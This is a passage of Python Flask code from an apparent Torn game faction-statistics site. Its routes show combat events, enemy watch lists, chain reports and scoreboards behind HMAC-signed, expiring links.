    return render_template("stuff_used.html", player_name=player['name'], stuff_used=stuff_used)
#=================================================================================
@app.route("/chain_bonus/<faction_player_t>", methods=['GET'])
@app.route("/rhubarb/chain_bonus/<faction_player_t>", methods=['GET'])
def chain_bonus(faction_player_t):
    """List long-term chain-bonus hits by one player for one faction.

    faction_player_t is "<fid>-<pid>-<timestamp>-<hmac>".  No login is
    required: the HMAC plus a 24-hour expiry gate access instead.
    """
    f_id = None
    p_id = None
    timestamp = None
    given_hmac = None
    right_now = int(time.time())
    logged_in = False
    # viewer may be anonymous; current_user.username raises when not logged in
    try:
        u = current_user.username
        logged_in = True
    except:
        pass
    re_object = bonus_token.match(faction_player_t)
    if re_object:
        f_id = re_object.group(1)
        p_id = re_object.group(2)
        timestamp = re_object.group(3)
        given_hmac = re_object.group(4)
    else:
        app.logger.info('in chain_bonus RE did not match URL')
        return render_template("bad_graph_request.html")
    # calc correct hmac over the same fields the link generator signed
    display_selection = (str(f_id) + '-' + str(p_id) + 'bonus' + str(timestamp) ).encode("utf-8")
    hmac_hex = hmac.new(hmac_key, display_selection, digestmod=hashlib.sha1).hexdigest()
    # test for correct hmac (constant-time comparison)
    if not hmac.compare_digest(hmac_hex, given_hmac):
        return render_template('message.html', message='link has been altered; cannot use it', logged_in=logged_in)
    # test for acceptable timestamp: links expire after 24 hours
    if ((int(timestamp) + 86400) < right_now):
        return render_template('message.html', message='too old; link has expired', logged_in=logged_in)
    # Need to show details of the player we are enquiring about, which might not be the current player viewing it.
    tbefore = int(time.time()) - 3600 # an hour ago: hide events from the last hour
    parm = (int(f_id), int(p_id), tbefore,)
    conn = sqlite3.connect('file:/var/torn/readonly_db?mode=ro', uri=True)
    c = conn.cursor()
    bonus_list = []
    c.execute("select et,att_name,att_id,verb,def_name,def_id,respect from long_term_bonus where fid=? and att_id=? and et<? order by et desc", parm)
    for row in c:
        record = list(row)
        # epoch seconds -> human-readable UTC date
        record[0] = (time.strftime("%Y-%m-%d", time.gmtime(record[0])))
        bonus_list.append(record)
    # look up the display name of the player being reported on
    c.execute("select name from namelevel where player_id=?", (int(p_id),))
    name = '?'
    for row in c:
        name = row[0]
    c.close()
    conn.close()
    rodb = read_sqlite.Rodb()
    faction_name = rodb.get_faction_name(f_id)
    return render_template("chain_bonus.html", faction_id=f_id, faction_name=faction_name, player={'name':name, 'pid':p_id, 'chain_bonus_list':bonus_list})
#=================================================================================
@app.route("/defend_summary/<faction_player_role_t>", methods=['GET'])
@app.route("/rhubarb/defend_summary/<faction_player_role_t>", methods=['GET'])
def defend_summary(faction_player_role_t):
    """Summary of lost defends for one player, grouped by attacker.

    faction_player_role_t is "<fid>-<pid><role><timestamp>-<hmac>" (parsed by
    the shared combat_token regex); the only role accepted here is 'defsum'.
    No login is required — the HMAC plus a 7-day expiry gate access.
    """
    right_now = int(time.time())
    logged_in = False
    # viewer may be anonymous; current_user.username raises when not logged in
    try:
        u = current_user.username
        logged_in = True
    except:
        pass
    # what page is this meant to produce, attack or defend?
    re_object = combat_token.match(faction_player_role_t)
    if not re_object:
        app.logger.info('in defend_summary RE did not match URL')
        return render_template("bad_graph_request.html")
    f_id = re_object.group(1)
    p_id = re_object.group(2)
    role = re_object.group(3)
    timestamp = re_object.group(4)
    given_hmac = re_object.group(5)
    # calc correct hmac over the same fields the link generator signed
    display_selection = (str(f_id) + '-' + str(p_id) + role + str(timestamp) ).encode("utf-8")
    hmac_hex = hmac.new(hmac_key, display_selection, digestmod=hashlib.sha1).hexdigest()
    # test for correct hmac (constant-time comparison)
    if not hmac.compare_digest(hmac_hex, given_hmac):
        return render_template('message.html', message='link has been altered; cannot use it', logged_in=logged_in)
    # test for acceptable timestamp: links expire after 7 days
    if ((int(timestamp) + (86400 * 7)) < right_now):
        return render_template('message.html', message='too old; link has expired', logged_in=logged_in)
    # reject the role before touching the database (the original opened the
    # connection first and had to close it in the rejection branch)
    if 'defsum' != role: # only allowed role
        return render_template("bad_graph_request.html")
    # no time limit on defends other than the 28 days of storage
    parm = (int(f_id), int(p_id),)
    conn = sqlite3.connect('file:/var/torn/readonly_db?mode=ro', uri=True)
    c = conn.cursor()
    c.execute("select count(att_id) as num,att_name,att_id,def_name,def_id from combat_events where fid=? and def_id=? and outcome like '%lost' group by att_id order by att_id", parm)
    # NOTE(review): rows go to the template raw — unlike combat_events(),
    # att_name/def_name are not passed through dehtml; confirm the template escapes
    defend_lines = c.fetchall()
    c.close()
    conn.close()
    return render_template("defend_summary.html", dl=defend_lines)
#=================================================================================
@app.route("/faction_attack/<faction_player_role_t>", methods=['GET'])
@app.route("/rhubarb/faction_attack/<faction_player_role_t>", methods=['GET'])
def combat_events(faction_player_role_t):
    """List attack or defend combat events for one player of one faction.

    faction_player_role_t is "<fid>-<pid><role><timestamp>-<hmac>" where
    role is 'attack' or 'defend'.  No login is required — the HMAC plus a
    24-hour expiry gate access instead.
    """
    f_id = None
    p_id = None
    role = None
    timestamp = None
    given_hmac = None
    df = None
    right_now = int(time.time())
    logged_in = False
    # viewer may be anonymous; current_user.username raises when not logged in
    try:
        u = current_user.username
        logged_in = True
    except:
        pass
    # what page is this meant to produce, attack or defend?
    re_object = combat_token.match(faction_player_role_t)
    if re_object:
        f_id = re_object.group(1)
        p_id = re_object.group(2)
        role = re_object.group(3)
        timestamp = re_object.group(4)
        given_hmac = re_object.group(5)
    else:
        app.logger.info('in combat_events RE did not match URL')
        return render_template("bad_graph_request.html")
    # calc correct hmac over the same fields the link generator signed
    display_selection = (str(f_id) + '-' + str(p_id) + role + str(timestamp) ).encode("utf-8")
    hmac_hex = hmac.new(hmac_key, display_selection, digestmod=hashlib.sha1).hexdigest()
    # test for correct hmac (constant-time comparison)
    if not hmac.compare_digest(hmac_hex, given_hmac):
        return render_template('message.html', message='link has been altered; cannot use it', logged_in=logged_in)
    # test for acceptable timestamp: links expire after 24 hours
    if ((int(timestamp) + 86400) < right_now):
        return render_template('message.html', message='too old; link has expired', logged_in=logged_in)
    tbefore = int(time.time()) - 3600 # an hour ago: hide events from the last hour
    parm = (int(f_id), int(p_id), tbefore,)
    conn = sqlite3.connect('file:/var/torn/readonly_db?mode=ro', uri=True)
    c = conn.cursor()
    if 'attack' == role:
        c.execute("select et,att_name,att_id,verb,def_name,def_id,outcome from combat_events where fid=? and att_id=? and et<? order by et desc", parm)
    elif 'defend' == role:
        c.execute("select et,att_name,att_id,verb,def_name,def_id,outcome from combat_events where fid=? and def_id=? and et<? order by et desc", parm)
    else:
        c.close()
        conn.close()
        return render_template("bad_graph_request.html")
    att_count = 0
    items = []
    old_et = 0
    old_att_id = 0
    old_def_id = 0
    safe_text = dehtml.Dehtml()
    for i in c:
        et = i[0]
        # skip consecutive duplicate rows (same time, attacker and defender)
        if (old_et == et) and (old_att_id == i[2]) and (old_def_id == i[5]):
            continue
        iso_time = datetime.datetime.utcfromtimestamp(et).isoformat()
        # names and outcome are HTML-cleaned before reaching the template
        items.append( { 'et': iso_time, 'att_name': safe_text.html_clean(i[1]), 'att_id': i[2], 'verb': i[3], 'def_name': safe_text.html_clean(i[4]), 'def_id': i[5], 'outcome': safe_text.html_clean(i[6])} )
        att_count += 1
        old_et = et
        old_att_id = i[2]
        old_def_id = i[5]
        # player name taken from the last kept row; the role decides which
        # side of the event names the player we are reporting on
        if 'attack' == role:
            player_name = i[1]
        else:
            player_name = i[4]
    c.close()
    conn.close()
    # player_name is only defined when at least one row survived, which is
    # exactly when att_count is non-zero
    if att_count:
        return render_template("combat_events.html", data=items, role=role, player_name=player_name)
    return render_template("combat_none.html", role=role, player_id=p_id)
#=================================================================================
@app.route("/rhubarb/enemy_watch", methods=['GET','POST'])
@app.route("/enemy_watch", methods=['GET','POST'])
@login_required
def enemy_watch():
    """Pick an enemy player and a time range, then redirect to the
    HMAC-signed /enemy_log page for that selection.

    GET shows the selection form; POST validates the chosen enemy and
    time range against this faction's ORM rows.
    """
    form = EnemyForm()
    rodb = read_sqlite.Rodb()
    faction_sum = rodb.get_faction_for_player(current_user.username)
    f_id = int(faction_sum['fid'])
    # if form.validate_on_submit():
    if request.method == 'POST':
        try:
            enemy = request.form['enemy']
            time_id = request.form['timerange_id']
        except:
            app.logger.info('error reading from enemy form')
            return render_template('message.html', message='something wrong with enemy selection', logged_in=True)
        # get enemy and time details from ORM
        wantenemy = Enemy.query.filter_by(id = enemy).first()
        if not wantenemy:
            # unknown enemy id in postgres
            return render_template('message.html', message='enemy selection not recognised', logged_in=True)
        # the selected enemy must belong to the viewer's own faction
        if not wantenemy.f_id == f_id:
            return render_template('message.html', message='enemy selection looks invalid for this faction', logged_in=True)
        wanttime = Timerange.query.filter_by(id = time_id).first()
        if not wanttime:
            # unknown time id in postgres
            return render_template('message.html', message='timerange selection not recognised', logged_in=True)
        # the selected time range must belong to the viewer's own faction
        if not wanttime.f_id == f_id:
            return render_template('message.html', message='timerange selection looks invalid for this faction', logged_in=True)
        # link to next page (with HMAC)
        selector = str(wantenemy.tornid) + '-' + str(wanttime.id) + '-' + str(int(time.time()))
        hmac_hex = hmac.new(hmac_key, selector.encode("utf-8"), digestmod=hashlib.sha1).hexdigest()
        return redirect('/rhubarb/enemy_log/' + selector + '-' + hmac_hex)
    # show form before submission; choices come from this faction's ORM rows
    form.enemy.choices = [(e.id, e.username + '[' + e.tornid + ']') for e in Enemy.query.filter_by(f_id = f_id).all()]
    form.timerange_id.choices = [(t.id, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(t.tstart)) + ' to ' + time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(t.tend))) for t in Timerange.query.filter_by(f_id = f_id).all()]
    return render_template('enemy_watch.html', title='Enemy Watch', form=form, now=int(time.time()))
#=================================================================================
@app.route("/rhubarb/enemy_watch_faction", methods=['GET','POST'])
@app.route("/enemy_watch_faction", methods=['GET','POST'])
@login_required
def enemy_watch_faction():
    """Pick an enemy faction and a time range, then show per-player attack
    counts against that faction.

    GET shows the selection form, offering only factions this faction has
    attacked at least 50 times; POST renders the per-player breakdown.
    """
    form = EnemyForm()
    rodb = read_sqlite.Rodb()
    faction_sum = rodb.get_faction_for_player(current_user.username)
    f_id = int(faction_sum['fid'])
    # if form.validate_on_submit():
    if request.method == 'POST':
        try:
            enemy = request.form['enemy']
            time_id = request.form['timerange_id']
        except:
            app.logger.info('error reading from enemy form')
            return render_template('message.html', message='something wrong with enemy selection', logged_in=True)
        wanttime = Timerange.query.filter_by(id = time_id).first()
        if not wanttime:
            # unknown time id in postgres
            return render_template('message.html', message='timerange selection not recognised', logged_in=True)
        # the selected time range must belong to the viewer's own faction
        if not wanttime.f_id == f_id:
            return render_template('message.html', message='timerange selection looks invalid for this faction', logged_in=True)
        # get details of target faction
        enemy_factions = {} # count of attacks by us on other factions
        all_enemy_faction_attacks = rodb.get_targeted_chain(f_id, enemy, wanttime.tstart, wanttime.tend) # specific faction, specific time
        player_items = []
        total = 0
        for apid in all_enemy_faction_attacks:
            # XXX not needed ? # link to next pages (with HMAC)
            # selector = str(apid) + '-' + str(enemy) + '-' + str(wanttime.id) + '-' + str(int(time.time()))
            # hmac_hex = hmac.new(hmac_key, selector.encode("utf-8"), digestmod=hashlib.sha1).hexdigest()
            player_items.append( [all_enemy_faction_attacks[apid][2], all_enemy_faction_attacks[apid][1], all_enemy_faction_attacks[apid][0]] )
            total += all_enemy_faction_attacks[apid][2]
        return render_template('enemy_watch_faction2.html', player_items=player_items, enemy_faction_name=rodb.get_faction_name(enemy), total=total)
    # show form before submission
    enemy_factions = {} # count of attacks by us on other factions
    all_enemy_faction_attacks = rodb.get_targeted_chain(f_id, None, 0, 2100000000) # not specific to faction, all time
    for x in all_enemy_faction_attacks.keys():
        # only bother with worthwhile numbers (at least 50 attacks)
        if x:
            if all_enemy_faction_attacks[x] >= 50:
                enemy_factions[x] = all_enemy_faction_attacks[x]
    # most-attacked factions first
    sorted_ef = sorted(enemy_factions.items(), key=lambda kv: kv[1], reverse=True)
    enemy_factions_counted = list(sorted_ef)
    form.enemy.choices = [(ek[0], rodb.get_faction_name(ek[0]) + '[' + str(ek[0]) + ']') for ek in enemy_factions_counted]
    form.timerange_id.choices = [(t.id, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(t.tstart)) + ' to ' + time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(t.tend))) for t in Timerange.query.filter_by(f_id = f_id).all()]
    return render_template('enemy_watch_faction.html', title='Enemy Watch Faction', form=form, enemy_factions_counted=enemy_factions_counted, now=int(time.time()))
#=================================================================================
@app.route("/enemy_log/<player_t_t_hmac>", methods=['GET'])
@app.route("/rhubarb/enemy_log/<player_t_t_hmac>", methods=['GET'])
@login_required
def enemy_log(player_t_t_hmac):
    """Summary of attacks on one enemy within a chosen time range, with a
    signed link per attacker to the detailed /target_log page.

    player_t_t_hmac is "<enemy_pid>-<timerange_id>-<timestamp>-<hmac>",
    as generated by enemy_watch().
    """
    # display summary for that enemy and time range
    # with links to times and outcomes
    p_id = None
    time_id = None
    timestamp = None
    given_hmac = None
    right_now = int(time.time())
    re_object = enemy_token.match(player_t_t_hmac)
    if re_object:
        p_id = re_object.group(1)
        time_id = re_object.group(2)
        timestamp = re_object.group(3)
        given_hmac = re_object.group(4)
    else:
        app.logger.info('in enemy_log RE did not match URL')
        return render_template("bad_graph_request.html")
    # calc correct hmac over the same fields enemy_watch signed
    display_selection = (str(p_id) + '-' + str(time_id) + '-' + str(timestamp) ).encode("utf-8")
    hmac_hex = hmac.new(hmac_key, display_selection, digestmod=hashlib.sha1).hexdigest()
    # test for correct hmac (constant-time comparison)
    if not hmac.compare_digest(hmac_hex, given_hmac):
        return render_template('message.html', message='link has been altered; cannot use it', logged_in=True)
    # test for acceptable timestamp: links expire after 24 hours
    if ((int(timestamp) + 86400) < right_now):
        return render_template('message.html', message='too old; link has expired', logged_in=True)
    # need to know faction of the player viewing this page
    rodb = read_sqlite.Rodb()
    faction_sum = rodb.get_faction_for_player(current_user.username)
    f_id = faction_sum['fid']
    enemy = Enemy.query.filter_by(tornid = p_id).first()
    if not enemy:
        return render_template('message.html', message='enemy not recognised in enemy_log', logged_in=True)
    wanttime = Timerange.query.filter_by(id = time_id).first()
    if not wanttime:
        # unknown time id in postgres
        return render_template('message.html', message='timerange not recognised in enemy_log', logged_in=True)
    # the time range must belong to the viewer's own faction
    if not wanttime.f_id == f_id:
        return render_template('message.html', message='timerange selection looks invalid for this faction in enemy_log', logged_in=True)
    tstart = wanttime.tstart
    tend = wanttime.tend
    if tend > right_now - 3600:
        tend = right_now - 3600 # do not display events within the last hour
    attacks = rodb.get_attacks_on_target(faction_sum['fid'], p_id, tstart, tend)
    # decorate each attacker row with a display name and a signed target_log link
    deco_attacks = []
    for d in attacks:
        name = str(d[1]) + '[' + str(d[2]) + ']'
        display_selection = str(p_id) + '-' + str(d[2])+ '-' + str(tstart) + '-' + str(tend)
        hmac_hex = hmac.new(hmac_key, display_selection.encode("utf-8"), digestmod=hashlib.sha1).hexdigest()
        link = '/rhubarb/target_log/' + display_selection + '-' + hmac_hex
        deco_attacks.append([d[0], name, link])
    return render_template("enemy_log.html", faction_sum=faction_sum, attacks=deco_attacks, target=str(enemy.username) + '[' + str(p_id) + ']')
#=================================================================================
@app.route("/target_log/<defid_attid_tstart_tend_hmac>", methods=['GET'])
@app.route("/rhubarb/target_log/<defid_attid_tstart_tend_hmac>", methods=['GET'])
def target_log(defid_attid_tstart_tend_hmac):
    """Details of attacks on a specific target by a specific player.

    The URL parameter is "<def_id>-<att_id>-<tstart>-<tend>-<hmac>" as
    generated by enemy_log().  No timestamp expiry: tstart/tend are part
    of the signed selection, so the HMAC alone gates access.
    """
    defid = None
    attid = None
    tstart = None
    tend = None
    given_hmac = None
    right_now = int(time.time())
    re_object = target_token.match(defid_attid_tstart_tend_hmac)
    if re_object:
        defid = re_object.group(1)
        attid = re_object.group(2)
        tstart = re_object.group(3)
        tend = re_object.group(4)
        given_hmac = re_object.group(5)
    else:
        app.logger.info('in target_log RE did not match URL')
        return render_template("bad_graph_request.html")
    # calc correct hmac over the same fields enemy_log signed
    display_selection = str(defid) + '-' + str(attid)+ '-' + str(tstart) + '-' + str(tend)
    hmac_hex = hmac.new(hmac_key, display_selection.encode("utf-8"), digestmod=hashlib.sha1).hexdigest()
    # test for correct hmac (constant-time comparison)
    if not hmac.compare_digest(hmac_hex, given_hmac):
        return render_template('message.html', message='link has been altered; cannot use it', logged_in=True)
    # from here it's similar to combat_events and uses the same template
    role='attack'
    conn = sqlite3.connect('file:/var/torn/readonly_db?mode=ro', uri=True)
    c = conn.cursor()
    c.execute("select et,att_name,att_id,verb,def_name,def_id,outcome from combat_events where def_id = ? and att_id=? and et>? and et<? order by et desc", (defid,attid,tstart,tend,))
    items = []
    old_et = 0
    old_att_id = 0
    old_def_id = 0
    # default so the render below cannot hit an unbound name when the
    # query returns no rows (the original raised UnboundLocalError then)
    player_name = '?'
    safe_text = dehtml.Dehtml()
    for i in c:
        et = i[0]
        # skip consecutive duplicate rows (same time, attacker and defender)
        if (old_et == et) and (old_att_id == i[2]) and (old_def_id == i[5]):
            continue
        iso_time = datetime.datetime.utcfromtimestamp(et).isoformat()
        items.append( { 'et': iso_time, 'att_name': safe_text.html_clean(i[1]), 'att_id': i[2], 'verb': i[3], 'def_name': safe_text.html_clean(i[4]), 'def_id': i[5], 'outcome': safe_text.html_clean(i[6])} )
        old_et = et
        old_att_id = i[2]
        old_def_id = i[5]
        player_name = i[1]
    c.close()
    conn.close()
    return render_template("combat_events.html", data=items, role=role, player_name=player_name)
#=================================================================================
@app.route("/delete_faction_enemies/", methods=['GET','POST'])
@app.route("/rhubarb/delete_faction_enemies/", methods=['GET','POST'])
@login_required
def delete_faction_enemies():
    """Leader-only form to delete one enemy record from this faction's list.

    GET shows the form; POST removes the selected enemy from the ORM and
    redirects back to /enemy_watch.
    """
    form = DeleteEnemyForm()
    rodb = read_sqlite.Rodb()
    faction_sum = rodb.get_faction_for_player(current_user.username)
    f_id = int(faction_sum['fid'])
    is_leader = bool_leader(int(current_user.username), faction_sum['fid'])
    if not is_leader:
        return redirect('/rhubarb/home')
    # read enemies from ORM - BEFORE the POST section otherwise form choices won't be ready
    baddies = {}
    want_enemy = Enemy.query.filter_by(f_id = faction_sum['fid']).all()
    for enemy in want_enemy:
        baddies[enemy.tornid] = enemy.username
    # string concatenation of k implies tornid is stored as a string — TODO confirm
    form.de_id.choices = [( int(k), baddies[k] + '[' + k + ']') for k in sorted(baddies.keys())]
    # - - - - - - - POST section
    if request.method == 'POST':
        if form.validate_on_submit():
            try:
                de_id = request.form['de_id']
            except:
                app.logger.info('error involving DeleteEnemyForm')
                return render_template('message.html', title='delete enemy', message='DeleteEnemyForm exception reading input', logged_in=True)
        else:
            app.logger.info('DeleteEnemyForm fails validation')
            return render_template('message.html', title='delete enemy', message='DeleteEnemyForm failed validation: ' + str(request.form), form=form , logged_in=True)
        if de_id:
            # only delete an enemy belonging to the viewer's own faction
            wantenemy = Enemy.query.filter_by(tornid = de_id).filter_by(f_id = faction_sum['fid']).first()
            if wantenemy:
                db.session.delete(wantenemy)
                db.session.commit()
        return redirect('/rhubarb/enemy_watch')
    # - - - - - - - POST section
    faction_name = rodb.get_faction_name(f_id)
    return render_template('delete_faction_enemies.html', title='Enemies', form=form, f_id=f_id, faction_name=faction_name)
#=================================================================================
@app.route("/add_faction_enemies/", methods=['GET','POST'])
@app.route("/rhubarb/add_faction_enemies/", methods=['GET','POST'])
@login_required
def add_faction_enemies():
    """Leader-only form to add an enemy player id to this faction's list.

    GET shows the form; POST validates the id is an integer, inserts a new
    Enemy ORM row and redirects back to /enemy_watch.
    """
    form = AddEnemyForm()
    rodb = read_sqlite.Rodb()
    faction_sum = rodb.get_faction_for_player(current_user.username)
    f_id = int(faction_sum['fid'])
    is_leader = bool_leader(int(current_user.username), faction_sum['fid'])
    if not is_leader:
        return redirect('/rhubarb/home')
    # - - - - - - - POST section
    if request.method == 'POST':
        if form.validate_on_submit():
            try:
                add_id = request.form['add_id']
            except:
                app.logger.info('error involving AddEnemyForm')
                return render_template('message.html', title='add enemy', message='AddEnemyForm exception reading input', logged_in=True)
        else:
            app.logger.info('AddEnemyForm fails validation')
            return render_template('message.html', title='add enemy', message='AddEnemyForm failed validation: ' + str(request.form), form=form , logged_in=True)
        # XXX form validation could do better
        # int() is used purely as a validity check; add_id is stored as received
        try:
            actual_integer = int(add_id)
        except ValueError:
            return render_template('message.html', title='add enemy', message='AddEnemyForm accepts only an integer', form=form , logged_in=True)
        if add_id:
            # XXX does not obtain username (fix up in another program) or check whether already in table
            new_enemy = Enemy (tornid = add_id, f_id = faction_sum['fid'], username = '?')
            db.session.add(new_enemy)
            db.session.commit()
        return redirect('/rhubarb/enemy_watch')
    # - - - - - - - POST section
    faction_name = rodb.get_faction_name(f_id)
    return render_template('add_faction_enemies.html', title='Enemies', form=form, f_id=f_id, faction_name=faction_name)
#=================================================================================
@app.route("/define_timerange/<t_to_t>", methods=['GET','POST'])
@app.route("/rhubarb/define_timerange/<t_to_t>", methods=['GET','POST'])
@login_required
def define_timerange(t_to_t):
    """Create a Timerange for the player's faction.

    *t_to_t* encodes "<tstart>-<tend>" (matched by the ``time_interval``
    regex); GET shows tables of nearby alternative start/end times, POST
    stores the range and redirects to the enemy-watch page.
    """
    # Labels and second-offsets for the candidate-time tables shown on GET.
    offsets = [
        ('planned time', 0),
        ('plus 1 day', 86400),
        ('minus 1 day', -86400),
        ('plus 1 hour', 3600),
        ('minus 1 hour', -3600),
        ('plus 1 minute', 60),
        ('minus 1 minute', -60),
    ]

    def _variants(base):
        # [label, epoch seconds, human-readable UTC timestamp] per offset.
        return [[label, base + off, time.strftime("%A %Y-%m-%d %H:%M", time.gmtime(base + off))]
                for label, off in offsets]

    form = TimeForm()
    rodb = read_sqlite.Rodb()
    faction_sum = rodb.get_faction_for_player(current_user.username)
    f_id = int(faction_sum['fid'])
    # sane defaults: now .. now + 1 day
    tstart = int(time.time())
    tend = tstart + 86400
    # what is t_to_t telling us?
    re_object = time_interval.match(t_to_t)
    if re_object:
        tstart = int(re_object.group(1))
        tend = int(re_object.group(2))
    if tstart > tend:
        tstart, tend = tend, tstart
    # - - - - - - - POST section
    if request.method == 'POST':
        new_tr = Timerange (tstart=tstart, tend=tend, f_id=f_id)
        db.session.add(new_tr)
        db.session.commit()
        return redirect('/rhubarb/enemy_watch')
    # - - - - - - - GET section: offer nearby alternative start/end times
    start_block = _variants(tstart)
    end_block = _variants(tend)
    # reuse the Rodb instance opened above
    faction_name = rodb.get_faction_name(f_id)
    return render_template('define_timerange.html', title='Timerange', form=form, start_block=start_block, end_block=end_block, tstart=tstart, tend=tend, f_id=f_id, faction_name=faction_name)
#=================================================================================
@app.route("/chain_reports", methods=['GET'])
@app.route("/rhubarb/chain_reports", methods=['GET'])
@login_required
def chain_reports():
    """List this faction's chains, split into finished and unfinished ones."""
    rodb = read_sqlite.Rodb()
    player = rodb.get_player_data(current_user.username)
    faction_sum = rodb.get_faction_for_player(current_user.username)
    f_id = faction_sum['fid']
    # finished and unfinished chains
    chains_fin = []
    chains_unf = []
    for chain in Chains.query.filter_by(f_id = f_id).all():
        start_text = time.strftime("%A %Y-%m-%d %H:%M", time.gmtime(chain.tstart))
        finished = bool(chain.tend)
        end_text = time.strftime("%A %Y-%m-%d %H:%M",
                                 time.gmtime(chain.tend if finished else chain.et))
        # Build an HMAC-signed token so /chain_details can verify the request.
        right_now = int(time.time())
        token_base = str(f_id) + '-chain-' + str(chain.tstart) + '-' + str(right_now)
        token_hmac = hmac.new(hmac_key, token_base.encode("utf-8"), digestmod=hashlib.sha1).hexdigest()
        row = [token_base + '-' + token_hmac, start_text, end_text, chain.chain_len, chain.respect]
        (chains_fin if finished else chains_unf).append(row)
    faction_name = rodb.get_faction_name(f_id)
    return render_template('chain_reports.html', title='Chain reports', chains_fin=chains_fin, chains_unf=chains_unf, f_id=f_id, faction_name=faction_name)
#=================================================================================
@app.route("/chain_details/<fid_tstart_timestamp_hmac>", methods=['GET'])
@app.route("/rhubarb/chain_details/<fid_tstart_timestamp_hmac>", methods=['GET'])
def chain_details(fid_tstart_timestamp_hmac):
    """Show one chain's details, addressed by an HMAC-signed token.

    Token form: "<fid>-chain-<tstart>-<timestamp>-<hmac>".  The HMAC must
    verify and the timestamp must be under a day old; no login is required
    because the signed token itself authorizes the view.
    """
    # what chain is this meant to display?
    re_object = chain_token.match(fid_tstart_timestamp_hmac)
    if re_object:
        f_id = re_object.group(1)
        chain_tstart = re_object.group(2)
        timestamp = re_object.group(3)
        given_hmac = re_object.group(4)
    else:
        app.logger.info('in chain_details RE did not match URL')
        return render_template("bad_graph_request.html")
    # calc correct hmac
    chain_selection = ( str(f_id) + '-chain-' + str(chain_tstart) + '-' + str(timestamp) ).encode("utf-8")
    hmac_hex = hmac.new(hmac_key, chain_selection, digestmod=hashlib.sha1).hexdigest()
    # test for correct hmac etc (constant-time comparison)
    right_now = int(time.time())
    if not hmac.compare_digest(hmac_hex, given_hmac):
        app.logger.info('in chain_details HMAC disagreement')
        return render_template("bad_graph_request.html")
    if ((int(timestamp) + 86400) < right_now):
        app.logger.info('in chain_details timestamp is old')
        return render_template("bad_graph_request.html")
    # read from ORM which chain has the right f_id and tstart
    ch = None
    chains_from_orm = Chains.query.filter_by(f_id = f_id).filter_by(tstart = chain_tstart).all()
    for chain in chains_from_orm:
        ch = chain
    if not ch:
        return render_template('message.html', message='The chain you are looking for is not found.', logged_in=False)
    # outline: start/end text plus whether the chain is over
    tstart_text = time.strftime("%Y-%m-%d %H:%M",time.gmtime(ch.tstart))
    if ch.tend:
        et_text = time.strftime("%Y-%m-%d %H:%M",time.gmtime(ch.tend))
        over = True
    else:
        et_text = time.strftime("%Y-%m-%d %H:%M",time.gmtime(ch.et))
        over = False
    outline = [tstart_text, et_text, over, ch.chain_len, ch.respect ]
    # members for names; entries left over after the scoreboard pass below
    # are the members with no recorded actions ("inactive")
    who_inactive = {}
    our_players = Chain_members.query.filter_by(pg_chain_id = ch.pg_chain_id).all()
    for p_mem in our_players:
        who_inactive[p_mem.player_id] = p_mem.player_name + '[' + str(p_mem.player_id) + ']'
    # bonus
    right_now = int(time.time())
    bonus_list = []
    bonus_table = Bonus_events.query.filter_by(pg_chain_id = ch.pg_chain_id).all()
    for bonus in bonus_table:
        if (right_now - bonus.et) > 3600:
            # ok to show attacker name
            try:
                stage = [ who_inactive[bonus.att_id] ]
            except KeyError:
                # attacker not in the member table - show a placeholder name
                stage = [ '?[' + str(bonus.att_id) + ']' ]
        else:
            # hide attacker name while the bonus is less than an hour old
            stage = [ 'CENSORED[000000]' ]
        stage.append(bonus.verb)
        stage.append( bonus.def_name + '[' + str(bonus.def_id) + ']')
        stage.append(bonus.outcome)
        stage.append(bonus.num_respect)
        bonus_list.append(stage)
    bonus_list = sorted(bonus_list, key=lambda one: one[-1])
    # player scoreboard (link to new route), signed like the chain token
    right_now = int(time.time())
    # use ch (the selected chain), not the leftover loop variable
    scoreboard_chain_selection_pre = str(f_id) + '-scoreboard-' + str(ch.tstart) + '-' + str(right_now)
    scoreboard_chain_selection = scoreboard_chain_selection_pre.encode("utf-8")
    hmac_hex = hmac.new(hmac_key, scoreboard_chain_selection, digestmod=hashlib.sha1).hexdigest()
    scoreboard_at = scoreboard_chain_selection_pre + '-' + hmac_hex + '-resd'
    # inactive players: drop everyone who has at least one recorded action
    player_scores = Chain_player_sum.query.filter_by(pg_chain_id = ch.pg_chain_id).all()
    for p_score in player_scores:
        if p_score.player_id in who_inactive:
            if p_score.actions:
                del who_inactive[p_score.player_id]
    rodb = read_sqlite.Rodb()
    faction_name = rodb.get_faction_name(f_id)
    return render_template('chain_details.html', title='Chain details', f_id=f_id, outline=outline, scoreboard_at=scoreboard_at, inactive = who_inactive, bonus = bonus_list, faction_name=faction_name)
#=================================================================================
@app.route("/chain_scoreboard/<fid_tstart_timestamp_hmac>", methods=['GET'])
@app.route("/rhubarb/chain_scoreboard/<fid_tstart_timestamp_hmac>", methods=['GET'])
def chain_scoreboard(fid_tstart_timestamp_hmac):
    """Per-player scoreboard for one chain, addressed by an HMAC-signed token.

    Token form: "<fid>-scoreboard-<tstart>-<timestamp>-<hmac>-<orderparm>",
    where orderparm is a 3-letter column key plus an optional trailing 'd'
    for descending order.  The signed token authorizes the view for 24 hours.
    """
    # what chain is this meant to display?
    re_object = chain_token_o.match(fid_tstart_timestamp_hmac)
    if re_object:
        f_id = re_object.group(1)
        chain_tstart = re_object.group(2)
        timestamp = re_object.group(3)
        given_hmac = re_object.group(4)
        orderparm = re_object.group(5)
    else:
        app.logger.info('in chain_player_summary RE did not match URL')
        return render_template("bad_graph_request.html")
    # calc correct hmac
    chain_selection = ( str(f_id) + '-scoreboard-' + str(chain_tstart) + '-' + str(timestamp) ).encode("utf-8")
    hmac_hex = hmac.new(hmac_key, chain_selection, digestmod=hashlib.sha1).hexdigest()
    # test for correct hmac etc (constant-time comparison)
    right_now = int(time.time())
    if not hmac.compare_digest(hmac_hex, given_hmac):
        app.logger.info('in chain_player_summary HMAC disagreement')
        return render_template("bad_graph_request.html")
    if ((int(timestamp) + 86400) < right_now):
        app.logger.info('in chain_player_summary timestamp is old')
        return redirect('/rhubarb/chain_reports')
    # read from ORM which chain has the right f_id and tstart
    ch = None
    chains_from_orm = Chains.query.filter_by(f_id = f_id).filter_by(tstart = chain_tstart).all()
    for chain in chains_from_orm:
        ch = chain
    if not ch:
        return render_template('message.html', message='The chain you are looking for is not found.', logged_in=False)
    # hyperlinks for ordering table
